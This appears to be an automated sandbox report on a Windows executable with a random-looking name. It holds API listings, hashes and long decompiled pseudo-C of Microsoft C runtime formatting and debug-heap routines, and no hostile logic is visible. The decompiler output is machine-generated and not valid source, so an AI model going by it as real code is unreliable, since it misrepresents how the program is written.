                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __invoke_watson_if_oneof__isctype_l_swprintf_s
                            • String ID: %.2X $(*_errno())$_printMemBlockData$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c
                            • API String ID: 4289034949-3158630120
                            • Opcode ID: 5f0ac36ceeaa4a52c2639f137b35c6f91630ce61040580c83f2f3a84afd0a49b
                            • Instruction ID: 0888166730624ae36cbb73fe55a1293b98df662e115287c871ec7ba7ae839a39
                            • Opcode Fuzzy Hash: 5f0ac36ceeaa4a52c2639f137b35c6f91630ce61040580c83f2f3a84afd0a49b
                            • Instruction Fuzzy Hash: CF317E74E04208DFDB08DBA5C952AAEB7B1AF46304F20857AE4157F2D2D7389E09DB58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __set_error_mode.LIBCMTD ref: 00412AA8
                            • __set_error_mode.LIBCMTD ref: 00412AB7
                            • GetStdHandle.KERNEL32(000000F4), ref: 00412ACE
                            • _strlen.LIBCMT ref: 00412AF4
                            • WriteFile.KERNEL32(000000FF,00000000,00000000,00000000), ref: 00412B0C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.254379313.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.254298173.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.254460883.0000000000427000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255654257.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255687103.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.255765961.0000000000635000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_mzQcZawXvh.jbxd
                            Similarity
                            • API ID: __set_error_mode$FileHandleWrite_strlen
                            • String ID: jjj$t/j
                            • API String ID: 1121076223-194299851
                            • Opcode ID: b4b10aa391df210e662528c2061c1ebacd69fff887b571a758ba531e34fb1c79
                            • Instruction ID: 5b11549a8f7628142caafa2ff959c02f517003328170dd5f0f9d0230ec78de6c
                            • Opcode Fuzzy Hash: b4b10aa391df210e662528c2061c1ebacd69fff887b571a758ba531e34fb1c79
                            • Instruction Fuzzy Hash: F721C470940204FFEF24CF84EA45BDE3375AF54754F14415AE405E2291D3B9AFA1DA8A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 70%
                            			E00422027(void* __ebx, void* __edi, void* __esi) {
                            				signed int _t499;
                            				void* _t504;
                            				signed int _t506;
                            				void* _t526;
                            				void* _t528;
                            				signed int _t536;
                            				void* _t555;
                            				void* _t556;
                            				signed int _t557;
                            				void* _t559;
                            
                            				L0:
                            				while(1) {
                            					L0:
                            					_t556 = __esi;
                            					_t555 = __edi;
                            					_t528 = __ebx;
                            					 *((intOrPtr*)(_t557 - 0x260)) = 0x27;
                            					while(1) {
                            						L148:
                            						 *(__ebp - 8) = 0x10;
                            						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
                            						__eflags =  *(__ebp - 0x10) & 0x00000080;
                            						if(( *(__ebp - 0x10) & 0x00000080) != 0) {
                            							 *(__ebp - 0x14) = 0x30;
                            							 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
                            							__eflags =  *(__ebp - 0x260) + 0x51;
                            							 *((char*)(__ebp - 0x13)) = __al;
                            							 *(__ebp - 0x1c) = 2;
                            						}
                            						while(1) {
                            							L153:
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            							__eflags =  *(__ebp - 0x10) & 0x00008000;
                            							if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            								__eflags =  *(__ebp - 0x10) & 0x00001000;
                            								if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            									__eflags =  *(__ebp - 0x10) & 0x00000020;
                            									if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            										__eflags =  *(__ebp - 0x10) & 0x00000040;
                            										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            											__ecx = __ebp + 0x14;
                            											__eax = E0041C290(__ebp + 0x14);
                            											__edx = 0;
                            											__eflags = 0;
                            											 *(__ebp - 0x2b8) = __eax;
                            											 *(__ebp - 0x2b4) = 0;
                            										} else {
                            											__eax = __ebp + 0x14;
                            											__eax = E0041C290(__ebp + 0x14);
                            											asm("cdq");
                            											 *(__ebp - 0x2b8) = __eax;
                            											 *(__ebp - 0x2b4) = __edx;
                            										}
                            									} else {
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            										__eflags =  *(__ebp - 0x10) & 0x00000040;
                            										if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            											__ecx = __ebp + 0x14;
                            											E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            											asm("cdq");
                            											 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
                            											 *(__ebp - 0x2b4) = __edx;
                            										} else {
                            											__eax = __ebp + 0x14;
                            											__eax = E0041C290(__ebp + 0x14);
                            											__ax = __eax;
                            											asm("cdq");
                            											 *(__ebp - 0x2b8) = __eax;
                            											 *(__ebp - 0x2b4) = __edx;
                            										}
                            									}
                            								} else {
                            									__eax = __ebp + 0x14;
                            									 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            									 *(__ebp - 0x2b4) = __edx;
                            								}
                            							} else {
                            								__ecx = __ebp + 0x14;
                            								 *(__ebp - 0x2b8) = E0041C2B0(__ebp + 0x14);
                            								 *(__ebp - 0x2b4) = __edx;
                            							}
                            							 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            							__eflags =  *(__ebp - 0x10) & 0x00000040;
                            							if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            								goto L170;
                            							}
                            							L166:
                            							__eflags =  *(__ebp - 0x2b4);
                            							if(__eflags > 0) {
                            								goto L170;
                            							}
                            							L167:
                            							if(__eflags < 0) {
                            								L169:
                            								 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
                            								__edx =  *(__ebp - 0x2b4);
                            								asm("adc edx, 0x0");
                            								__edx =  ~( *(__ebp - 0x2b4));
                            								 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
                            								 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
                            								L171:
                            								 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            								__eflags =  *(__ebp - 0x10) & 0x00008000;
                            								if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            									__eflags =  *(__ebp - 0x10) & 0x00001000;
                            									if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            										__edx =  *(__ebp - 0x2c0);
                            										__eax =  *(__ebp - 0x2bc);
                            										__eax =  *(__ebp - 0x2bc) & 0x00000000;
                            										__eflags = __eax;
                            										 *(__ebp - 0x2bc) = __eax;
                            									}
                            								}
                            								__eflags =  *(__ebp - 0x30);
                            								if( *(__ebp - 0x30) >= 0) {
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            									 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
                            									__eflags =  *(__ebp - 0x30) - 0x200;
                            									if( *(__ebp - 0x30) > 0x200) {
                            										 *(__ebp - 0x30) = 0x200;
                            									}
                            								} else {
                            									 *(__ebp - 0x30) = 1;
                            								}
                            								 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            								__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            								if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
                            									 *(__ebp - 0x1c) = 0;
                            								}
                            								__eax = __ebp - 0x49;
                            								 *(__ebp - 4) = __ebp - 0x49;
                            								while(1) {
                            									L181:
                            									__ecx =  *(__ebp - 0x30);
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            									__eflags =  *(__ebp - 0x30);
                            									if( *(__ebp - 0x30) > 0) {
                            										goto L183;
                            									}
                            									L182:
                            									 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            									__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
                            									if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
                            										L186:
                            										__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
                            										 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
                            										__ecx =  *(__ebp - 4);
                            										__ecx =  *(__ebp - 4) + 1;
                            										 *(__ebp - 4) = __ecx;
                            										 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
                            										__eflags =  *(__ebp - 0x10) & 0x00000200;
                            										if(( *(__ebp - 0x10) & 0x00000200) == 0) {
                            											while(1) {
                            												L190:
                            												__eflags =  *(__ebp - 0x28);
                            												if( *(__ebp - 0x28) != 0) {
                            													goto L216;
                            												}
                            												L191:
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            												__eflags =  *(__ebp - 0x10) & 0x00000040;
                            												if(( *(__ebp - 0x10) & 0x00000040) != 0) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000100;
                            													__eflags =  *(__ebp - 0x10) & 0x00000100;
                            													if(( *(__ebp - 0x10) & 0x00000100) == 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000001;
                            														__eflags =  *(__ebp - 0x10) & 0x00000001;
                            														if(( *(__ebp - 0x10) & 0x00000001) == 0) {
                            															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000002;
                            															__eflags =  *(__ebp - 0x10) & 0x00000002;
                            															if(( *(__ebp - 0x10) & 0x00000002) != 0) {
                            																 *(__ebp - 0x14) = 0x20;
                            																 *(__ebp - 0x1c) = 1;
                            															}
                            														} else {
                            															 *(__ebp - 0x14) = 0x2b;
                            															 *(__ebp - 0x1c) = 1;
                            														}
                            													} else {
                            														 *(__ebp - 0x14) = 0x2d;
                            														 *(__ebp - 0x1c) = 1;
                            													}
                            												}
                            												 *(__ebp - 0x18) =  *(__ebp - 0x18) -  *(__ebp - 0x24);
                            												__eax =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
                            												 *(__ebp - 0x2c4) =  *(__ebp - 0x18) -  *(__ebp - 0x24) -  *(__ebp - 0x1c);
                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x0000000c;
                            												__eflags =  *(__ebp - 0x10) & 0x0000000c;
                            												if(( *(__ebp - 0x10) & 0x0000000c) == 0) {
                            													__edx = __ebp - 0x24c;
                            													__eax =  *(__ebp + 8);
                            													__ecx =  *(__ebp - 0x2c4);
                            													__eax = E00422790(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
                            												}
                            												__edx = __ebp - 0x24c;
                            												__eax =  *(__ebp + 8);
                            												__ecx =  *(__ebp - 0x1c);
                            												__edx = __ebp - 0x14;
                            												E004227D0( *(__ebp - 0x1c), __ebp - 0x14,  *(__ebp - 0x1c),  *(__ebp + 8), __ebp - 0x24c) =  *(__ebp - 0x10);
                            												__eax =  *(__ebp - 0x10) & 0x00000008;
                            												__eflags =  *(__ebp - 0x10) & 0x00000008;
                            												if(( *(__ebp - 0x10) & 0x00000008) != 0) {
                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
                            													__eflags =  *(__ebp - 0x10) & 0x00000004;
                            													if(( *(__ebp - 0x10) & 0x00000004) == 0) {
                            														__edx = __ebp - 0x24c;
                            														__eax =  *(__ebp + 8);
                            														__ecx =  *(__ebp - 0x2c4);
                            														__eax = E00422790(0x30,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
                            													}
                            												}
                            												__eflags =  *(__ebp - 0xc);
                            												if( *(__ebp - 0xc) == 0) {
                            													L212:
                            													__ecx = __ebp - 0x24c;
                            													__edx =  *(__ebp + 8);
                            													__eax =  *(__ebp - 0x24);
                            													__ecx =  *(__ebp - 4);
                            													__eax = E004227D0(__ecx, __ecx,  *(__ebp - 0x24),  *(__ebp + 8), __ebp - 0x24c);
                            													goto L213;
                            												} else {
                            													L204:
                            													__eflags =  *(__ebp - 0x24);
                            													if( *(__ebp - 0x24) <= 0) {
                            														goto L212;
                            													}
                            													L205:
                            													 *(__ebp - 0x2dc) = 0;
                            													__edx =  *(__ebp - 4);
                            													 *(__ebp - 0x2c8) =  *(__ebp - 4);
                            													__eax =  *(__ebp - 0x24);
                            													 *(__ebp - 0x2cc) =  *(__ebp - 0x24);
                            													while(1) {
                            														L206:
                            														__ecx =  *(__ebp - 0x2cc);
                            														 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
                            														 *(__ebp - 0x2cc) =  *(__ebp - 0x2cc) - 1;
                            														__eflags = __ecx;
                            														if(__ecx == 0) {
                            															break;
                            														}
                            														L207:
                            														__eax =  *(__ebp - 0x2c8);
                            														 *(__ebp - 0x32e) =  *( *(__ebp - 0x2c8));
                            														__edx =  *(__ebp - 0x32e) & 0x0000ffff;
                            														__eax = __ebp - 0x2d8;
                            														__ecx = __ebp - 0x2d0;
                            														 *(__ebp - 0x2dc) = E004212A0(__ebp - 0x2d0, __ebp - 0x2d8, 6,  *(__ebp - 0x32e) & 0x0000ffff);
                            														 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
                            														 *(__ebp - 0x2c8) =  *(__ebp - 0x2c8) + 2;
                            														__eflags =  *(__ebp - 0x2dc);
                            														if( *(__ebp - 0x2dc) != 0) {
                            															L209:
                            															 *(__ebp - 0x24c) = 0xffffffff;
                            															break;
                            														}
                            														L208:
                            														__eflags =  *(__ebp - 0x2d0);
                            														if( *(__ebp - 0x2d0) != 0) {
                            															L210:
                            															__eax = __ebp - 0x24c;
                            															__ecx =  *(__ebp + 8);
                            															__edx =  *(__ebp - 0x2d0);
                            															__ebp - 0x2d8 = E004227D0( *(__ebp + 8), __ebp - 0x2d8,  *(__ebp - 0x2d0),  *(__ebp + 8), __ebp - 0x24c);
                            															continue;
                            														}
                            														goto L209;
                            													}
                            													L211:
                            													L213:
                            													__eflags =  *(__ebp - 0x24c);
                            													if( *(__ebp - 0x24c) >= 0) {
                            														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000004;
                            														__eflags =  *(__ebp - 0x10) & 0x00000004;
                            														if(( *(__ebp - 0x10) & 0x00000004) != 0) {
                            															__eax = __ebp - 0x24c;
                            															__ecx =  *(__ebp + 8);
                            															__edx =  *(__ebp - 0x2c4);
                            															__eax = E00422790(0x20,  *(__ebp - 0x2c4),  *(__ebp + 8), __ebp - 0x24c);
                            														}
                            													}
                            												}
                            												L216:
                            												__eflags =  *(__ebp - 0x20);
                            												if( *(__ebp - 0x20) != 0) {
                            													 *(__ebp - 0x20) = L0040C240( *(__ebp - 0x20), 2);
                            													 *(__ebp - 0x20) = 0;
                            												}
                            												while(1) {
                            													L218:
                            													 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
                            													_t547 =  *(_t557 - 0x251);
                            													 *(_t557 + 0xc) =  *(_t557 + 0xc) + 1;
                            													if( *(_t557 - 0x251) == 0 ||  *(_t557 - 0x24c) < 0) {
                            														break;
                            													} else {
                            														if( *(_t557 - 0x251) < 0x20 ||  *(_t557 - 0x251) > 0x78) {
                            															 *(_t557 - 0x310) = 0;
                            														} else {
                            															 *(_t557 - 0x310) =  *( *(_t557 - 0x251) + L"pecifier\", 0)") & 0xf;
                            														}
                            													}
                            													L7:
                            													 *(_t557 - 0x250) =  *(_t557 - 0x310);
                            													_t506 =  *(_t557 - 0x250) * 9;
                            													_t536 =  *(_t557 - 0x25c);
                            													_t547 = ( *(_t506 + _t536 + 0x4083d0) & 0x000000ff) >> 4;
                            													 *(_t557 - 0x25c) = ( *(_t506 + _t536 + 0x4083d0) & 0x000000ff) >> 4;
                            													if( *(_t557 - 0x25c) != 8) {
                            														L16:
                            														 *(_t557 - 0x318) =  *(_t557 - 0x25c);
                            														__eflags =  *(_t557 - 0x318) - 7;
                            														if( *(_t557 - 0x318) > 7) {
                            															continue;
                            														}
                            														L17:
                            														switch( *((intOrPtr*)( *(_t557 - 0x318) * 4 +  &M004225E0))) {
                            															case 0:
                            																L18:
                            																 *(_t557 - 0xc) = 0;
                            																_t509 = E00419390( *(_t557 - 0x251) & 0x000000ff, E0040D3B0(_t557 - 0x40));
                            																_t562 = _t559 + 8;
                            																__eflags = _t509;
                            																if(_t509 == 0) {
                            																	L24:
                            																	E004226F0( *(_t557 - 0x251) & 0x000000ff,  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
                            																	_t559 = _t562 + 0xc;
                            																	goto L218;
                            																} else {
                            																	E004226F0( *((intOrPtr*)(_t557 + 8)),  *(_t557 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t557 + 8)), _t557 - 0x24c);
                            																	_t562 = _t562 + 0xc;
                            																	_t541 =  *( *(_t557 + 0xc));
                            																	 *(_t557 - 0x251) =  *( *(_t557 + 0xc));
                            																	_t547 =  *(_t557 + 0xc) + 1;
                            																	__eflags = _t547;
                            																	 *(_t557 + 0xc) = _t547;
                            																	asm("sbb eax, eax");
                            																	 *(_t557 - 0x27c) =  ~( ~( *(_t557 - 0x251)));
                            																	if(_t547 == 0) {
                            																		_push(L"(ch != _T(\'\\0\'))");
                            																		_push(0);
                            																		_push(0x486);
                            																		_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            																		_push(2);
                            																		_t521 = L0040E1A0();
                            																		_t562 = _t562 + 0x14;
                            																		__eflags = _t521 - 1;
                            																		if(_t521 == 1) {
                            																			asm("int3");
                            																		}
                            																	}
                            																	L22:
                            																	__eflags =  *(_t557 - 0x27c);
                            																	if( *(_t557 - 0x27c) != 0) {
                            																		goto L24;
                            																	} else {
                            																		 *((intOrPtr*)(L0040EC70(_t541))) = 0x16;
                            																		E00411A50(_t528, _t541, _t555, _t556, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
                            																		 *(_t557 - 0x2f4) = 0xffffffff;
                            																		E0040D380(_t557 - 0x40);
                            																		_t499 =  *(_t557 - 0x2f4);
                            																		goto L229;
                            																	}
                            																}
                            															case 1:
                            																L25:
                            																 *(__ebp - 0x2c) = 0;
                            																__edx =  *(__ebp - 0x2c);
                            																 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                            																__eax =  *(__ebp - 0x28);
                            																 *(__ebp - 0x18) =  *(__ebp - 0x28);
                            																__ecx =  *(__ebp - 0x18);
                            																 *(__ebp - 0x1c) = __ecx;
                            																 *(__ebp - 0x10) = 0;
                            																 *(__ebp - 0x30) = 0xffffffff;
                            																 *(__ebp - 0xc) = 0;
                            																goto L218;
                            															case 2:
                            																L26:
                            																__edx =  *((char*)(__ebp - 0x251));
                            																 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
                            																 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            																 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
                            																__eflags =  *(__ebp - 0x31c) - 0x10;
                            																if( *(__ebp - 0x31c) > 0x10) {
                            																	goto L33;
                            																}
                            																L27:
                            																__ecx =  *(__ebp - 0x31c);
                            																_t72 = __ecx + 0x422618; // 0x498d04
                            																__edx =  *_t72 & 0x000000ff;
                            																switch( *((intOrPtr*)(( *_t72 & 0x000000ff) * 4 +  &M00422600))) {
                            																	case 0:
                            																		goto L30;
                            																	case 1:
                            																		goto L31;
                            																	case 2:
                            																		goto L29;
                            																	case 3:
                            																		goto L28;
                            																	case 4:
                            																		goto L32;
                            																	case 5:
                            																		goto L33;
                            																}
                            															case 3:
                            																L34:
                            																__edx =  *((char*)(__ebp - 0x251));
                            																__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            																if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																	__eax =  *(__ebp - 0x18);
                            																	__eax =  *(__ebp - 0x18) * 0xa;
                            																	__eflags = __eax;
                            																	__ecx =  *((char*)(__ebp - 0x251));
                            																	_t96 = __ecx - 0x30; // -48
                            																	__edx = __eax + _t96;
                            																	 *(__ebp - 0x18) = __eax + _t96;
                            																} else {
                            																	__eax = __ebp + 0x14;
                            																	 *(__ebp - 0x18) = E0041C290(__ebp + 0x14);
                            																	__eflags =  *(__ebp - 0x18);
                            																	if( *(__ebp - 0x18) < 0) {
                            																		__ecx =  *(__ebp - 0x10);
                            																		__ecx =  *(__ebp - 0x10) | 0x00000004;
                            																		__eflags = __ecx;
                            																		 *(__ebp - 0x10) = __ecx;
                            																		 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																		 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
                            																	}
                            																}
                            																goto L218;
                            															case 4:
                            																L40:
                            																 *(__ebp - 0x30) = 0;
                            																goto L218;
                            															case 5:
                            																L41:
                            																__eax =  *((char*)(__ebp - 0x251));
                            																__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
                            																if( *((char*)(__ebp - 0x251)) != 0x2a) {
                            																	__edx =  *(__ebp - 0x30);
                            																	__edx =  *(__ebp - 0x30) * 0xa;
                            																	__eflags = __edx;
                            																	_t107 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
                            																	__ecx = __edx + _t107;
                            																	 *(__ebp - 0x30) = __ecx;
                            																} else {
                            																	__ecx = __ebp + 0x14;
                            																	 *(__ebp - 0x30) = E0041C290(__ebp + 0x14);
                            																	__eflags =  *(__ebp - 0x30);
                            																	if( *(__ebp - 0x30) < 0) {
                            																		 *(__ebp - 0x30) = 0xffffffff;
                            																	}
                            																}
                            																goto L218;
                            															case 6:
                            																L47:
                            																__edx =  *((char*)(__ebp - 0x251));
                            																 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
                            																 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            																 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
                            																__eflags =  *(__ebp - 0x320) - 0x2e;
                            																if( *(__ebp - 0x320) > 0x2e) {
                            																	L70:
                            																	goto L218;
                            																}
                            																L48:
                            																__ecx =  *(__ebp - 0x320);
                            																_t115 = __ecx + 0x422640; // 0x1e4e9003
                            																__edx =  *_t115 & 0x000000ff;
                            																switch( *((intOrPtr*)(( *_t115 & 0x000000ff) * 4 +  &M0042262C))) {
                            																	case 0:
                            																		L53:
                            																		__edx =  *(__ebp + 0xc);
                            																		__eax =  *( *(__ebp + 0xc));
                            																		__eflags =  *( *(__ebp + 0xc)) - 0x36;
                            																		if( *( *(__ebp + 0xc)) != 0x36) {
                            																			L56:
                            																			__edx =  *(__ebp + 0xc);
                            																			__eax =  *( *(__ebp + 0xc));
                            																			__eflags =  *( *(__ebp + 0xc)) - 0x33;
                            																			if( *( *(__ebp + 0xc)) != 0x33) {
                            																				L59:
                            																				__edx =  *(__ebp + 0xc);
                            																				__eax =  *( *(__ebp + 0xc));
                            																				__eflags =  *( *(__ebp + 0xc)) - 0x64;
                            																				if( *( *(__ebp + 0xc)) == 0x64) {
                            																					L65:
                            																					L67:
                            																					goto L70;
                            																				}
                            																				L60:
                            																				__ecx =  *(__ebp + 0xc);
                            																				__edx =  *__ecx;
                            																				__eflags =  *__ecx - 0x69;
                            																				if( *__ecx == 0x69) {
                            																					goto L65;
                            																				}
                            																				L61:
                            																				__eax =  *(__ebp + 0xc);
                            																				__ecx =  *( *(__ebp + 0xc));
                            																				__eflags = __ecx - 0x6f;
                            																				if(__ecx == 0x6f) {
                            																					goto L65;
                            																				}
                            																				L62:
                            																				__edx =  *(__ebp + 0xc);
                            																				__eax =  *( *(__ebp + 0xc));
                            																				__eflags =  *( *(__ebp + 0xc)) - 0x75;
                            																				if( *( *(__ebp + 0xc)) == 0x75) {
                            																					goto L65;
                            																				}
                            																				L63:
                            																				__ecx =  *(__ebp + 0xc);
                            																				__edx =  *__ecx;
                            																				__eflags =  *__ecx - 0x78;
                            																				if( *__ecx == 0x78) {
                            																					goto L65;
                            																				}
                            																				L64:
                            																				__eax =  *(__ebp + 0xc);
                            																				__ecx =  *( *(__ebp + 0xc));
                            																				__eflags = __ecx - 0x58;
                            																				if(__ecx != 0x58) {
                            																					 *(__ebp - 0x25c) = 0;
                            																					goto L18;
                            																				}
                            																				goto L65;
                            																			}
                            																			L57:
                            																			__ecx =  *(__ebp + 0xc);
                            																			__edx =  *((char*)(__ecx + 1));
                            																			__eflags =  *((char*)(__ecx + 1)) - 0x32;
                            																			if( *((char*)(__ecx + 1)) != 0x32) {
                            																				goto L59;
                            																			} else {
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																				 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																				__ecx =  *(__ebp - 0x10);
                            																				__ecx =  *(__ebp - 0x10) & 0xffff7fff;
                            																				 *(__ebp - 0x10) = __ecx;
                            																				goto L67;
                            																			}
                            																		}
                            																		L54:
                            																		__ecx =  *(__ebp + 0xc);
                            																		__edx =  *((char*)(__ecx + 1));
                            																		__eflags =  *((char*)(__ecx + 1)) - 0x34;
                            																		if( *((char*)(__ecx + 1)) != 0x34) {
                            																			goto L56;
                            																		} else {
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) | 0x00008000;
                            																			 *(__ebp - 0x10) = __ecx;
                            																			goto L67;
                            																		}
                            																	case 1:
                            																		L68:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
                            																		goto L70;
                            																	case 2:
                            																		L49:
                            																		__eax =  *(__ebp + 0xc);
                            																		__ecx =  *( *(__ebp + 0xc));
                            																		__eflags = __ecx - 0x6c;
                            																		if(__ecx != 0x6c) {
                            																			__ecx =  *(__ebp - 0x10);
                            																			__ecx =  *(__ebp - 0x10) | 0x00000010;
                            																			__eflags = __ecx;
                            																			 *(__ebp - 0x10) = __ecx;
                            																		} else {
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																			 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
                            																		}
                            																		goto L70;
                            																	case 3:
                            																		L69:
                            																		__eax =  *(__ebp - 0x10);
                            																		__eax =  *(__ebp - 0x10) | 0x00000800;
                            																		__eflags = __eax;
                            																		 *(__ebp - 0x10) = __eax;
                            																		goto L70;
                            																	case 4:
                            																		goto L70;
                            																}
                            															case 7:
                            																L71:
                            																__ecx =  *((char*)(__ebp - 0x251));
                            																 *(__ebp - 0x324) = __ecx;
                            																 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            																 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
                            																__eflags =  *(__ebp - 0x324) - 0x37;
                            																if( *(__ebp - 0x324) > 0x37) {
                            																	while(1) {
                            																		L190:
                            																		__eflags =  *(__ebp - 0x28);
                            																		if( *(__ebp - 0x28) != 0) {
                            																			goto L216;
                            																		}
                            																		goto L191;
                            																	}
                            																}
                            																L72:
                            																_t156 =  *(__ebp - 0x324) + 0x4226ac; // 0xcccccc0d
                            																__ecx =  *_t156 & 0x000000ff;
                            																switch( *((intOrPtr*)(__ecx * 4 +  &M00422670))) {
                            																	case 0:
                            																		L123:
                            																		 *(__ebp - 0x2c) = 1;
                            																		__ecx =  *((char*)(__ebp - 0x251));
                            																		__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
                            																		__eflags = __ecx;
                            																		 *((char*)(__ebp - 0x251)) = __cl;
                            																		goto L124;
                            																	case 1:
                            																		L73:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																			__eax =  *(__ebp - 0x10);
                            																			__eax =  *(__ebp - 0x10) | 0x00000800;
                            																			__eflags = __eax;
                            																			 *(__ebp - 0x10) = __eax;
                            																		}
                            																		goto L75;
                            																	case 2:
                            																		L88:
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000830;
                            																		if(( *(__ebp - 0x10) & 0x00000830) == 0) {
                            																			__ecx =  *(__ebp - 0x10);
